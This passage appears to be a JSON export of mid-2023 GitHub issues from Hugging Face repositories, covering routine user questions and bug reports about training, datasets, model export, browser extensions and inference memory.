resume_from_checkpoint=resume_from_checkpoint, \u2502\r\n\u2502 1540 \u2502 \u2502 \u2502 trial=trial, \u2502\r\n\u2502 \u2502\r\n\u2502 /home/students/kulcsar/anaconda3/envs/software_bubble_updated_pytorch/lib/py \u2502\r\n\u2502 thon3.9/site-packages/transformers/trainer.py:1802 in _inner_training_loop \u2502\r\n\u2502 \u2502\r\n\u2502 1799 \u2502 \u2502 \u2502 \u2502 \u2502 self.control = self.callback_handler.on_step_begi \u2502\r\n\u2502 1800 \u2502 \u2502 \u2502 \u2502 \u2502\r\n\u2502 1801 \u2502 \u2502 \u2502 \u2502 with self.accelerator.accumulate(model): \u2502\r\n\u2502 \u2771 1802 \u2502 \u2502 \u2502 ", "url": "https://github.com/huggingface/trl/issues/503", "state": "closed", "labels": [], "created_at": "2023-07-06T22:19:21Z", "updated_at": "2023-08-14T15:05:10Z", "user": "MaggieK410" }, { "repo": "huggingface/transformers.js", "number": 182, "title": "Website and extension using same model", "body": "Per the chrome extension example, you pack the model with the extension. Is there a way for a website and chrome extension to use the same cached model? If my project has both a website and extension, I hope they could use a single model instead of having store 2 on the user's machine. \r\n", "url": "https://github.com/huggingface/transformers.js/issues/182", "state": "open", "labels": [ "question" ], "created_at": "2023-07-06T17:43:48Z", "updated_at": "2023-07-16T17:26:09Z", "user": "escottgoodwin" }, { "repo": "huggingface/chat-ui", "number": 331, "title": "How to send model name as a input to API endpoint", "body": "I want to host two models and query them by switching between . 
The problem is I'm not able to send model name as a parameter from UI to API endpoints.\r\n\r\nCan someone help on this?", "url": "https://github.com/huggingface/chat-ui/issues/331", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-06T13:04:04Z", "updated_at": "2023-09-18T14:03:18Z", "user": "sankethgadadinni" }, { "repo": "huggingface/transformers", "number": 24685, "title": "How to get the last 4 Hidden states from the feature extraction pipeline", "body": "I have defined a pipeline for Feature extraction\r\n```\r\n# Create the pipeline\r\np = pipeline(\r\n task=\"feature-extraction\",\r\n tokenizer=\"microsoft/biogpt\",\r\n model=\"microsoft/biogpt\",\r\n framework=\"pt\",\r\n device=0\r\n)\r\nbio_gpt = AutoModel.from_pretrained(\"microsoft/biogpt\", output_hidden_states= True)\r\nbio_gpt = bio_gpt.to(device)\r\n```\r\n\r\nand I want to extract the embeddings of the last token of the last hidden state, and the Average Pooling of the last 4 layers using the pipeline approach I am doing it like this\r\n\r\n_Last token of the last hidden state:_\r\n\r\n```\r\ndef extract_last_token(last_hidden_states):\r\n last_hidden_states = np.array(last_hidden_states)\r\n return last_hidden_states[:,-1,:]\r\n\r\n# Process the data using the pipeline\r\nresults = p([row[\"text\"] for _, row in df2.iterrows()])\r\n\r\n# Extract the last token of the last hidden state\r\nembeddings = [extract_last_token(hidden_state) for hidden_state in results]\r\n\r\n# Create a DataFrame to store the results\r\ndf2[\"embeddings2\"] = embeddings\r\n```\r\n_Average pooling of the last 4 layers:_\r\n```\r\ndef mean_pooling(last_hidden_states, ):\r\n last_4_layers = last_hidden_states[-4:] # Consider the last 4 layers\r\n return np.mean(last_4_layers, axis=1)\r\n\r\n# Process the data using the pipeline\r\nresults = p([row[\"text\"] for _, row in df2.iterrows()])\r\n\r\nfeatures = np.squeeze(results)\r\n\r\nprint(features.shape)\r\n# Perform mean pooling on the last hidden states\r\nembeddings = [mean_pooling(hidden_state) for hidden_state in results]\r\n\r\n# Create a DataFrame to store the results\r\ndf2[\"embeddings4\"] = embeddings\r\n```\r\nThe issues are:\r\n\r\n1. When I extract the embeddings of the 4 last layers or the 12 last layers the embeddings are always the same\r\n\r\n![image](https://github.com/huggingface/transformers/assets/138615931/70c265aa-4182-4265-bb22-ddc197388c03)\r\n\r\n2. 
The embeddings of the last token of the last hidden state are different from the same embeddings using the \"manual\" method\r\n\r\n![image](https://github.com/huggingface/transformers/assets/138615931/a7b9b629-9c65-4b76-b669-89d9e64103de)\r\n\r\nWeirdly, in the above picture two of the embeddings are the same but with swapped row IDs; this indicates another problem that I don't see. If you can spot it, I'd appreciate it.\r\n\r\nHere is the code for how I did the manual version:\r\n```\r\noutput = bio_gpt(**model_inputs)\r\n\r\n# Get the last state\r\nlast_state = output.last_hidden_state\r\n\r\ncls_embeddings = last_state[:, -1, :]\r\n\r\n# Print the last state\r\nprint(cls_embeddings)\r\n\r\n# Assign cls_embeddings to \"embeddings4\" column in df2\r\ndf2[\"embeddings_manual\"] = [cls_embeddings[i].cpu().detach().numpy() for i in range(len(df2))]\r\n```", "url": "https://github.com/huggingface/transformers/issues/24685", "state": "closed", "labels": [], "created_at": "2023-07-06T08:45:08Z", "updated_at": "2023-08-14T15:02:35Z", "user": "Luke-4" }, { "repo": "huggingface/setfit", "number": 393, "title": " AttributeError: 'list' object has no attribute 'shuffle'", "body": "I am getting the \"AttributeError: 'list' object has no attribute 'shuffle'\" error when I try to use setfit.\r\n\r\nThe dataset has two columns: one is text and the second is the label column.", "url": "https://github.com/huggingface/setfit/issues/393", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-05T16:47:17Z", "updated_at": "2023-12-05T14:41:13Z", "user": "gpirge" }, { "repo": "huggingface/datasets", "number": 6008, "title": "Dataset.from_generator consistently freezes at ~1000 rows", "body": "### Describe the bug\n\nWhenever I try to create a dataset which contains images using `Dataset.from_generator`, it freezes around 996 rows. I suppose it has something to do with memory consumption, but there's more memory available. 
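One data point that may matter: each row here is a 512×512×3 float64 array, i.e. roughly 6 MB, so if rows get buffered in batches of ~1000 before the Arrow writer flushes (which I believe is the default), that would be several GB right around where it freezes. A lighter variant of the generator I'm testing simply casts to float32 to halve the row size:

```python
import numpy as np
from datasets import Dataset

def gen():
    for _ in range(10000):
        # np.random.rand returns float64; casting halves the per-row footprint
        yield {"i": np.random.rand(512, 512, 3).astype(np.float32)}

Dataset.from_generator(gen)
```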
Somehow it worked a few times, but mostly this makes the datasets library much more cumbersome to work with, because generators are the easiest way to turn an existing dataset into a Hugging Face dataset.\r\n\r\nI've let it run in the frozen state for way longer than it can possibly take to load the actual dataset.\r\n\r\nLet me know if you have ideas on how to resolve it!\n\n### Steps to reproduce the bug\n\n```python\r\nfrom datasets import Dataset\r\nimport numpy as np\r\n\r\ndef gen():\r\n for row in range(10000):\r\n yield {\"i\": np.random.rand(512, 512, 3)}\r\n \r\nDataset.from_generator(gen)\r\n# -> 90% of the time gets stuck around 1000 rows\r\n```\n\n### Expected behavior\n\nShould continue and go through all the examples yielded by the generator, or at least throw an error or somehow communicate what's going on.\n\n### Environment info\n\n- `datasets` version: 2.8.0\r\n- Platform: Linux-5.15.0-52-generic-x86_64-with-glibc2.29\r\n- Python version: 3.8.10\r\n- PyArrow version: 12.0.1\r\n- Pandas version: 1.5.1\r\n", "url": "https://github.com/huggingface/datasets/issues/6008", "state": "closed", "labels": [], "created_at": "2023-07-05T16:06:48Z", "updated_at": "2023-07-10T13:46:39Z", "comments": 3, "user": "andreemic" }, { "repo": "huggingface/dataset-viewer", "number": 1482, "title": "diagnose why the mongo server uses so much CPU", "body": "We have many alerts about CPU usage on the mongo server.\r\n\r\n```\r\nSystem: CPU (User) % has gone above 95 \r\n```\r\n\r\nWhy?", "url": "https://github.com/huggingface/dataset-viewer/issues/1482", "state": "closed", "labels": [ "question", "infra", "improvement / optimization", "P1" ], "created_at": "2023-07-04T16:04:06Z", "updated_at": "2024-02-06T14:49:20Z", "user": "severo" }, { "repo": "huggingface/text-generation-inference", "number": 536, "title": "How to enable vllm", "body": "### Feature request\n\nHow to enable vllm\n\n### Motivation\n\nHow to enable vllm\n\n### Your contribution\n\nHow to enable vllm", "url": "https://github.com/huggingface/text-generation-inference/issues/536", "state": "closed", "labels": [], "created_at": "2023-07-04T05:20:21Z", "updated_at": "2023-07-04T10:56:29Z", "user": "lucasjinreal" }, { "repo": "huggingface/transformers.js", "number": 180, "title": "[Question] Running transformers.js in a browser extension", "body": "Hello,\r\n\r\nI'm trying to build a chrome extension that uses Transformers.js. When I try to import it in the background worker script, I first get an error that says process is not available, because apparently someone decided browser plugins shouldn't use process.env anymore. I found a solution that said to put \r\n```\r\ndefine: {\r\n 'process.env': {}\r\n}\r\n```\r\nin my vite.config.js, which worked to get me past that, but the next error is:\r\n```\r\nError: Dynamic require of \"../bin/napi-v3/undefined/undefined/onnxruntime_binding.node\" is not supported\r\n```\r\nHas anyone gotten this working in a browser environment yet? I saw a video about tensorflow.js in the browser, but I'd prefer to use transformers.js because you already provided me with an example of how to get it to behave like Sentence Transformers. 
:) ", "url": "https://github.com/huggingface/transformers.js/issues/180", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-04T01:09:29Z", "updated_at": "2023-07-16T15:58:30Z", "user": "davidtbo" }, { "repo": "huggingface/datasets", "number": 6003, "title": "interleave_datasets & DataCollatorForLanguageModeling having a conflict ?", "body": "### Describe the bug\n\nHi everyone :)\r\n\r\nI have two local & custom datasets (1 \"sentence\" per line) which I split along the 95/5 lines for pre-training a Bert model. I use a modified version of `run_mlm.py` in order to be able to make use of `interleave_dataset`:\r\n\r\n- `tokenize()` runs fine\r\n- `group_text()` runs fine\r\n\r\nEverytime, on step 19, I get \r\n\r\n```pytb\r\n File \"env/lib/python3.9/site-packages/transformers/data/data_collator.py\", line 779, in torch_mask_tokens\r\n inputs[indices_random] = random_words[indices_random]\r\nRuntimeError: Index put requires the source and destination dtypes match, got Float for the destination and Long for the source.\r\n```\r\n\r\nI tried:\r\n- training without interleave on dataset 1, it runs\r\n- training without interleave on dataset 2, it runs\r\n- training without `.to_iterable_dataset()`, it hangs then crash\r\n- training without group_text() and padding to max_length seemed to fix the issue, but who knows if this was just because it was an issue that would come much later in terms of steps.\r\n\r\nI might have coded something wrong, but I don't get what \n\n### Steps to reproduce the bug\n\nI have this function:\r\n\r\n```py\r\ndef build_dataset(path: str, percent: str):\r\n dataset = load_dataset(\r\n \"text\",\r\n data_files={\"train\": [path]},\r\n split=f\"train[{percent}]\"\r\n )\r\n dataset = dataset.map(\r\n lambda examples: tokenize(examples[\"text\"]),\r\n batched=True,\r\n num_proc=num_proc,\r\n )\r\n\r\n dataset = dataset.map(\r\n group_texts,\r\n batched=True,\r\n num_proc=num_proc,\r\n desc=f\"Grouping texts in chunks of {tokenizer.max_seq_length}\",\r\n remove_columns=[\"text\"]\r\n )\r\n\r\n print(len(dataset))\r\n return dataset.to_iterable_dataset()\r\n```\r\n\r\nI hardcoded group_text:\r\n```py\r\n def group_texts(examples):\r\n # Concatenate all texts.\r\n concatenated_examples = {k: list(chain(*examples[k])) for k in examples.keys()}\r\n total_length = len(concatenated_examples[list(examples.keys())[0]])\r\n # We drop the small remainder, and if the total_length < max_seq_length we exclude this batch and return an empty dict.\r\n # We could add padding if the model supported it instead of this drop, you can customize this part to your needs.\r\n total_length = (total_length // 512) * 512\r\n # Split by chunks of max_len.\r\n result = {\r\n k: [t[i: i + 512] for i in range(0, total_length, 512)]\r\n for k, t in concatenated_examples.items()\r\n }\r\n # result = {k: [el for el in elements if el] for k, elements in result.items()}\r\n return result\r\n```\r\n\r\nAnd then I build datasets using the following code:\r\n\r\n```py\r\ntrain1 = build_dataset(\"d1.txt\", \":95%\")\r\ntrain2 = build_dataset(\"d2.txt\", \":95%\")\r\ndev1 = build_dataset(\"d1.txt\", \"95%:\")\r\ndev2 = build_dataset(\"d2.txt\", \"95%:\")\r\n```\r\n\r\nand finally I run\r\n```py\r\ntrain_dataset = interleave_datasets(\r\n [train1, train2],\r\n probabilities=[0.8, 0.2],\r\n seed=42\r\n)\r\neval_dataset = interleave_datasets(\r\n [dev1, dev2],\r\n probabilities=[0.8, 0.2],\r\n seed=42\r\n)\r\n```\r\n\r\nThen I run the training part which remains mostly untouched:\r\n\r\n> 
CUDA_VISIBLE_DEVICES=1 python custom_dataset.py --model_type bert --per_device_train_batch_size 32 --do_train --output_dir /var/mlm/training-bert/model --max_seq_length 512 --save_steps 10000 --save_total_limit 3 --auto_find_batch_size --logging_dir ./logs-bert --learning_rate 0.0001 --do_train --num_train_epochs 25 --warmup_steps 10000 --max_step 45000 --fp16\n\n### Expected behavior\n\nThe model should then train normally, but fails every time at the same step (19).\r\n\r\nPrinting the variables at `inputs[indices_random] = random_words[indices_random]` shows a magnificent empty tensor (, 32) [if I remember correctly]\n\n### Environment info\n\ntransformers[torch] 4.30.2\r\nUbuntu\r\nA100 0 CUDA 12\r\nDriver Version: 525.116.04", "url": "https://github.com/huggingface/datasets/issues/6003", "state": "open", "labels": [], "created_at": "2023-07-03T17:15:31Z", "updated_at": "2023-07-03T17:15:31Z", "comments": 0, "user": "PonteIneptique" }, { "repo": "huggingface/dataset-viewer", "number": 1472, "title": "How to show fan-in jobs' results in response (\"pending\" and \"failed\" keys)", "body": "In cache entries of fan-in jobs we have keys `pending` and `failed`. For example, config-level `/parquet` response has the following format (only \"parquet_files\" key):\r\n```python\r\n{\r\n \"parquet_files\": [\r\n {\r\n \"dataset\": \"duorc\",\r\n \"config\": \"ParaphraseRC\",\r\n \"split\": \"test\",\r\n \"url\": \"https://huggingface.co/datasets/duorc/resolve/refs%2Fconvert%2Fparquet/ParaphraseRC/duorc-test.parquet\",\r\n \"filename\": \"duorc-test.parquet\",\r\n \"size\": 6136591\r\n },\r\n ... # list of parquet files\r\n ],\r\n}\r\n``` \r\nand for dataset-level it also has `pending` and `failed` keys:\r\n```python\r\n{\r\n \"parquet_files\": [\r\n {\r\n \"dataset\": \"duorc\",\r\n \"config\": \"ParaphraseRC\",\r\n \"split\": \"test\",\r\n \"url\": \"https://huggingface.co/datasets/duorc/resolve/refs%2Fconvert%2Fparquet/ParaphraseRC/duorc-test.parquet\",\r\n \"filename\": \"duorc-test.parquet\",\r\n \"size\": 6136591\r\n },\r\n ... # list of parquet files\r\n ],\r\n \"pending\": [],\r\n \"failed\": []\r\n}\r\n```\r\nTo me, undocumented `\"pending\"` and `\"failed\"` keys look a bit too technical and unclear.\r\n\r\nWhat we can do:\r\n* document what these keys mean\r\n* don't document it, but for these kinds of endpoints show only examples where all levels are specified (currently that's not the case). So, don't show examples that return the `pending` and `failed` fields.\r\n* anything else? @huggingface/datasets-server ", "url": "https://github.com/huggingface/dataset-viewer/issues/1472", "state": "open", "labels": [ "question", "api", "P2" ], "created_at": "2023-07-03T16:49:10Z", "updated_at": "2023-08-11T15:26:24Z", "user": "polinaeterna" }, { "repo": "huggingface/blog", "number": 1281, "title": "How to push or share lora adapter to hugging face hub? 
", "body": "hi, i trained falcon model and already set push_to_hub paramter in training argument, but they not working.\r\n\r\n```\r\nfrom transformers import TrainingArguments\r\n\r\noutput_dir = \"chatb_f\"\r\nper_device_train_batch_size = 4\r\ngradient_accumulation_steps = 4\r\noptim = \"paged_adamw_32bit\"\r\nsave_steps = 60\r\nlogging_steps = 10\r\nlearning_rate = 2e-4\r\nmax_grad_norm = 0.3\r\nmax_steps = 60\r\nwarmup_ratio = 0.03\r\nlr_scheduler_type = \"constant\"\r\n\r\ntraining_arguments = TrainingArguments(\r\n output_dir=output_dir,\r\n per_device_train_batch_size=per_device_train_batch_size,\r\n gradient_accumulation_steps=gradient_accumulation_steps,\r\n optim=optim,\r\n save_steps=save_steps,\r\n logging_steps=logging_steps,\r\n learning_rate=learning_rate,\r\n fp16=True,\r\n max_grad_norm=max_grad_norm,\r\n max_steps=max_steps,\r\n warmup_ratio=warmup_ratio,\r\n group_by_length=True,\r\n lr_scheduler_type=lr_scheduler_type,\r\n push_to_hub = True\r\n)\r\n\r\n\r\nfrom trl import SFTTrainer\r\n\r\nmax_seq_length = 512\r\n\r\ntrainer = SFTTrainer(\r\n model=model,\r\n train_dataset=dataset,\r\n peft_config=peft_config,\r\n dataset_text_field=\"text\",\r\n max_seq_length=max_seq_length,\r\n tokenizer=tokenizer,\r\n args=training_arguments,\r\n)\r\n```\r\n", "url": "https://github.com/huggingface/blog/issues/1281", "state": "open", "labels": [], "created_at": "2023-07-01T13:56:47Z", "updated_at": "2023-07-01T13:57:40Z", "user": "imrankh46" }, { "repo": "huggingface/diffusers", "number": 3918, "title": "How to control the position of an object in an image using text in a txt2img model?", "body": "How to control the position of an object in an image using text in a txt2img model? I know this is easy to achieve in an img2img model, but how can it be done in a txt2img model?\r\n\r\nOr, how can a model be fine-tuned to achieve this effect? For example, specifying x=0, y=1, which corresponds to the top-left corner.\r\n\r\nI have tried similar approaches, but they are not sensitive to the position. I suspect it may be due to insensitivity to the text input. I tried using compel to enhance the positional features, but still couldn't control the position. Do I need to retrain the text_encoder related part for this?\r\n\r\nIn my fine-tuning code, I commented out the no_grad parts for text_encoder and others. Is this correct, and will it automatically train the text_encoder?\r\n\r\nThank you!", "url": "https://github.com/huggingface/diffusers/issues/3918", "state": "closed", "labels": [ "stale" ], "created_at": "2023-07-01T02:44:24Z", "updated_at": "2023-08-08T15:03:15Z", "user": "XiaoyuZhuang" }, { "repo": "huggingface/dataset-viewer", "number": 1464, "title": "Change the way we represent ResponseAlreadyComputedError in the cache", "body": "When a \"parallel\" step has already been computed, an error is stored in the cache with `ResponseAlreadyComputedError`error_code, and http status 500 (ie: if `split-first-rows-from-streaming` exists, then `split-first-rows-from-parquet` does not need to be computed).\r\n\r\nBut it makes it hard to monitor the \"true\" errors. If we follow the analogy with the HTTP status codes, it should be 3xx instead of 5xx, ie: a redirection to another resource.\r\n\r\nI don't know how we should change this though. 
Let's put ideas in the issue.", "url": "https://github.com/huggingface/dataset-viewer/issues/1464", "state": "closed", "labels": [ "question", "improvement / optimization", "P2" ], "created_at": "2023-06-30T18:13:34Z", "updated_at": "2024-02-23T09:56:05Z", "user": "severo" }, { "repo": "huggingface/transformers.js", "number": 176, "title": "[Question] Embeddings for the Entire Document", "body": "\r\nHi, thanks for all the effort, I really appreciate it. I enjoy coding in JS and do all things in JS. \r\nIs it a good idea to load the entire JSON document to get embeddings? What tokenizer should I choose? I have a ton of valuable information in my key and value pairs. Or should I craft a sentence from the document?\r\n\r\n```json\r\n{\r\n \"id\": 2053926,\r\n \"city\": \"New York\",\r\n \"user_id\": 3578165,\r\n \"price\": 75,\r\n \"native_currency\": \"USD\",\r\n \"price_native\": 75,\r\n \"price_formatted\": \"$75\",\r\n \"lat\": 40.854397081884706,\r\n \"lng\": -73.93876393071385,\r\n \"country\": \"United States\",\r\n \"name\": \"air conditioned room w/ great view\",\r\n \"smart_location\": \"New York, NY\",\r\n \"has_double_blind_reviews\": false,\r\n \"instant_bookable\": false,\r\n \"bedrooms\": 1,\r\n \"beds\": 1,\r\n \"bathrooms\": 1,\r\n \"market\": \"New York\",\r\n \"min_nights\": 1,\r\n \"neighborhood\": \"Washington Heights\",\r\n \"person_capacity\": 3,\r\n \"state\": \"NY\",\r\n \"zipcode\": \"10033\",\r\n \"user\": {\r\n \"user\": {\r\n \"id\": 3578165,\r\n \"first_name\": \"Benjamin\",\r\n \"has_profile_pic\": true\r\n }\r\n },\r\n \"address\": \"Pinehurst Avenue, New York, NY 10033, United States\",\r\n \"country_code\": \"US\",\r\n \"cancellation_policy\": \"flexible\",\r\n \"property_type\": \"Apartment\",\r\n \"reviews_count\": 14,\r\n \"room_type\": \"Private room\",\r\n \"room_type_category\": \"private_room\",\r\n \"picture_count\": 18,\r\n \"_geoloc\": {\r\n \"lat\": 40.854397081884706,\r\n \"lng\": -73.93876393071385\r\n },\r\n \"objectID\": \"507205000\"\r\n}\r\n```", "url": "https://github.com/huggingface/transformers.js/issues/176", "state": "closed", "labels": [ "question" ], "created_at": "2023-06-30T16:20:37Z", "updated_at": "2023-06-30T22:43:03Z", "user": "hadminh" }, { "repo": "huggingface/sentence-transformers", "number": 2247, "title": "how to tune hyperparameters using optuna or raytune", "body": "I want to finetune the MiniLM model and tune its hyperparameters, but the model.fit function doesn't return any loss. Nor does it show any performance metrics while training the model.
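\r\n\r\nFor context, this is roughly the objective I am trying to build (a sketch; the model name, the hyperparameter ranges, and the `train_examples`/`dev_examples` lists of `InputExample`s are placeholders of mine, and the evaluator is how I would get a score back, since fit itself returns nothing):\r\n\r\n```python\r\nimport optuna\r\nfrom torch.utils.data import DataLoader\r\nfrom sentence_transformers import SentenceTransformer, losses\r\nfrom sentence_transformers.evaluation import EmbeddingSimilarityEvaluator\r\n\r\ndef objective(trial):\r\n    lr = trial.suggest_float(\"lr\", 1e-6, 1e-4, log=True)\r\n    epochs = trial.suggest_int(\"epochs\", 1, 4)\r\n    model = SentenceTransformer(\"sentence-transformers/all-MiniLM-L6-v2\")\r\n    train_dataloader = DataLoader(train_examples, shuffle=True, batch_size=16)\r\n    train_loss = losses.CosineSimilarityLoss(model)\r\n    evaluator = EmbeddingSimilarityEvaluator.from_input_examples(dev_examples)\r\n    model.fit(train_objectives=[(train_dataloader, train_loss)], epochs=epochs,\r\n              optimizer_params={\"lr\": lr}, evaluator=evaluator)\r\n    # use the held-out evaluator score as the value optuna maximizes\r\n    return model.evaluate(evaluator)\r\n\r\nstudy = optuna.create_study(direction=\"maximize\")\r\nstudy.optimize(objective, n_trials=20)\r\n```\r\n\r\n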
What do you suggest in this case?", "url": "https://github.com/huggingface/sentence-transformers/issues/2247", "state": "open", "labels": [], "created_at": "2023-06-30T13:16:04Z", "updated_at": "2023-06-30T13:16:04Z", "user": "nikshrimali" }, { "repo": "huggingface/diffusers", "number": 3914, "title": "how to fine-tuning the sd model in low resolutions", "body": "When fine-tuning the stable diffusion model, there is a parameter called 'resolution' which, if set to a value like 128 or 256 to reduce GPU memory usage, could potentially have negative effects on training performance and results.\r\n\r\nWould setting the resolution to a value other than 512, such as 128 or 256, have any adverse impact on training effectiveness and the final results?\r\n\r\nIs there a way to modify the pre-trained model's resolution to 128 or 256, or do I need to train a separate low-resolution version of the model?\r\n\r\nI have experimented with different resolutions, and it seems that setting the resolution to 512 produces the best results. Training with lower resolutions tends to generate complex and messy outputs.\r\n\r\nI couldn't find any similar issues on GitHub, as most discussions focus on super-resolution. Thank you for your response!", "url": "https://github.com/huggingface/diffusers/issues/3914", "state": "closed", "labels": [ "stale" ], "created_at": "2023-06-30T12:42:12Z", "updated_at": "2023-08-08T15:03:16Z", "user": "XiaoyuZhuang" }, { "repo": "huggingface/optimum", "number": 1148, "title": "Falcon-40b-instruct on Runpod", "body": "### System Info\n\n```shell\n2 x A100 80GB\r\n32 vCPU 251 GB RAM\n```\n\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nfrom transformers import AutoTokenizer, AutoModelForCausalLM\r\nimport transformers\r\nimport torch\r\n\r\nmodel = \"tiiuae/falcon-40b-instruct\"\r\n\r\ntokenizer = AutoTokenizer.from_pretrained(model)\r\npipeline = transformers.pipeline(\r\n \"text-generation\",\r\n model=model,\r\n tokenizer=tokenizer,\r\n torch_dtype=torch.bfloat16,\r\n trust_remote_code=True,\r\n device_map=\"auto\",\r\n)\r\nsequences = pipeline(\r\n \"What does a raindrop feel when it hits the sea?:\",\r\n max_length=200,\r\n do_sample=True,\r\n top_k=10,\r\n num_return_sequences=1,\r\n eos_token_id=tokenizer.eos_token_id,\r\n)\r\nfor seq in sequences:\r\n print(f\"Result: {seq['generated_text']}\")\r\n\r\n\r\n\n\n### Expected behavior\n\nExpected to Run smoothly, give an output. \r\nError : \r\nThe model 'RWForCausalLM' is not supported for text-generation. 
Supported models are ['BartForCausalLM', 'BertLMHeadModel', 'BertGenerationDecoder', 'BigBirdForCausalLM', 'BigBirdPegasusForCausalLM', 'BioGptForCausalLM', 'BlenderbotForCausalLM', 'BlenderbotSmallForCausalLM', 'BloomForCausalLM', 'CamembertForCausalLM', 'CodeGenForCausalLM', 'CpmAntForCausalLM', 'CTRLLMHeadModel', 'Data2VecTextForCausalLM', 'ElectraForCausalLM', 'ErnieForCausalLM', 'GitForCausalLM', 'GPT2LMHeadModel', 'GPT2LMHeadModel', 'GPTBigCodeForCausalLM', 'GPTNeoForCausalLM', 'GPTNeoXForCausalLM', 'GPTNeoXJapaneseForCausalLM', 'GPTJForCausalLM', 'LlamaForCausalLM', 'MarianForCausalLM', 'MBartForCausalLM', 'MegaForCausalLM', 'MegatronBertForCausalLM', 'MvpForCausalLM', 'OpenLlamaForCausalLM', 'OpenAIGPTLMHeadModel', 'OPTForCausalLM', 'PegasusForCausalLM', 'PLBartForCausalLM', 'ProphetNetForCausalLM', 'QDQBertLMHeadModel', 'ReformerModelWithLMHead', 'RemBertForCausalLM', 'RobertaForCausalLM', 'RobertaPreLayerNormForCausalLM', 'RoCBertForCausalLM', 'RoFormerForCausalLM', 'RwkvForCausalLM', 'Speech2Text2ForCausalLM', 'TransfoXLLMHeadModel', 'TrOCRForCausalLM', 'XGLMForCausalLM', 'XLMWithLMHeadModel', 'XLMProphetNetForCausalLM', 'XLMRobertaForCausalLM', 'XLMRobertaXLForCausalLM', 'XLNetLMHeadModel', 'XmodForCausalLM'].\r\n/usr/local/lib/python3.10/dist-packages/transformers/generation/utils.py:1259: UserWarning: You have modified the pretrained model configuration to control generation. This is a deprecated strategy to control generation and will be removed soon, in a future version. Please use a generation configuration file (see https://huggingface.co/docs/transformers/main_classes/text_generation)\r\n warnings.warn(\r\nSetting `pad_token_id` to `eos_token_id`:11 for open-end generation.", "url": "https://github.com/huggingface/optimum/issues/1148", "state": "closed", "labels": [ "bug" ], "created_at": "2023-06-29T18:48:05Z", "updated_at": "2023-06-30T15:39:29Z", "comments": 3, "user": "Mrin7" }, { "repo": "huggingface/text-generation-inference", "number": 509, "title": "Question: How to estimate memory requirements for a certain batch size/", "body": "I was just wondering how the GPU memory requirements vary depending on model size/batch size of request/max tokens. 
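My current back-of-envelope guess (please correct me if this is wrong) is that, on top of the weights, the KV cache dominates and grows linearly in all three variables:\r\n\r\n```python\r\ndef kv_cache_bytes(n_layers, n_heads, head_dim, max_tokens, batch_size, dtype_bytes=2):\r\n    # one key vector and one value vector per token, per layer, per head\r\n    return 2 * n_layers * n_heads * head_dim * max_tokens * batch_size * dtype_bytes\r\n\r\n# e.g. a Llama-7B-shaped model (32 layers, 32 heads, head_dim 128) in fp16,\r\n# at batch size 8 and 2048 tokens: ~8.6 GB of KV cache on top of ~14 GB of weights\r\nprint(kv_cache_bytes(32, 32, 128, 2048, 8) / 1e9)\r\n```\r\n\r\n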
In doing some experiments where I needed the server to keep running for a long time, I found that it often ran out of memory and shut down - is there a way to estimate the memory footprint based on these variables?", "url": "https://github.com/huggingface/text-generation-inference/issues/509", "state": "closed", "labels": [], "created_at": "2023-06-29T15:39:51Z", "updated_at": "2023-07-03T01:41:02Z", "user": "vaishakkrishna" }, { "repo": "huggingface/transformers.js", "number": 171, "title": "[Doc request] Add an example guide of how to use it in Svelte (and deploy to HF Spaces)", "body": "Similar to the cool React guide, would be awesome to showcase how to use transformers.js from Svelte (and how to deploy the resulting app to Spaces)\r\n\r\nNo need to do a SvelteKit version IMO, Svelte would be sufficient\r\n\r\nMaybe a good first issue for the community?", "url": "https://github.com/huggingface/transformers.js/issues/171", "state": "open", "labels": [ "enhancement", "help wanted", "good first issue" ], "created_at": "2023-06-29T10:25:10Z", "updated_at": "2023-08-21T20:36:59Z", "user": "julien-c" }, { "repo": "huggingface/optimum", "number": 1145, "title": "How to use mean pooling with ONNX export with optimum-cli", "body": "### System Info\n\n```shell\n- `optimum` version: 1.8.8\r\n- `transformers` version: 4.30.2\r\n- Platform: Windows-10-10.0.19045-SP0\r\n- Python version: 3.11.3\r\n- Huggingface_hub version: 0.15.1\r\n- PyTorch version (GPU?): 2.0.1+cpu (cuda availabe: False)\r\n- Tensorflow version (GPU?): not installed (cuda availabe: NA)\n```\n\n\n### Who can help?\n\n@michaelbenayoun\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nThe Model card of paraphrase-MiniLM-L3-v2 at HuggingFace mentions that\r\n\r\n**Without [sentence-transformers](https://www.sbert.net/), you can use the model like this: First, you pass your input through the transformer model, then you have to apply the right pooling-operation on-top of the contextualized word embeddings.**\r\n\r\nHow to do this using the ONNX model generated using the optimum-cli?\r\n\r\nCan we do this while generating the ONNX model? \r\n\r\nFor example, the **txtai** library does this ([https://github.com/neuml/txtai/blob/master/examples/18_Export_and_run_models_with_ONNX.ipynb])\r\n\r\n```\r\nonnx = HFOnnx()\r\nembeddings = onnx(\"sentence-transformers/paraphrase-MiniLM-L6-v2\", \"pooling\", \"embeddings.onnx\", quantize=True)\r\n\r\n```\r\n\r\nOr. does this needs to be done somehow after the ONNX model is generated (post-processing)? \n\n### Expected behavior\n\nSupport for pooling in optimum_cli ", "url": "https://github.com/huggingface/optimum/issues/1145", "state": "open", "labels": [ "bug" ], "created_at": "2023-06-29T05:57:35Z", "updated_at": "2023-06-29T05:57:35Z", "user": "aunwesha" }, { "repo": "huggingface/chat-ui", "number": 328, "title": "Is there a way to see all of a user's history?", "body": "I want to see the chat history of all my users. ", "url": "https://github.com/huggingface/chat-ui/issues/328", "state": "closed", "labels": [ "question" ], "created_at": "2023-06-29T05:01:55Z", "updated_at": "2023-07-03T10:43:53Z", "user": "ildoonet" }, { "repo": "huggingface/chat-ui", "number": 327, "title": "Tokens limits issue", "body": "Input validation error: `inputs` tokens + `max_new_tokens` must be <= 1512. 
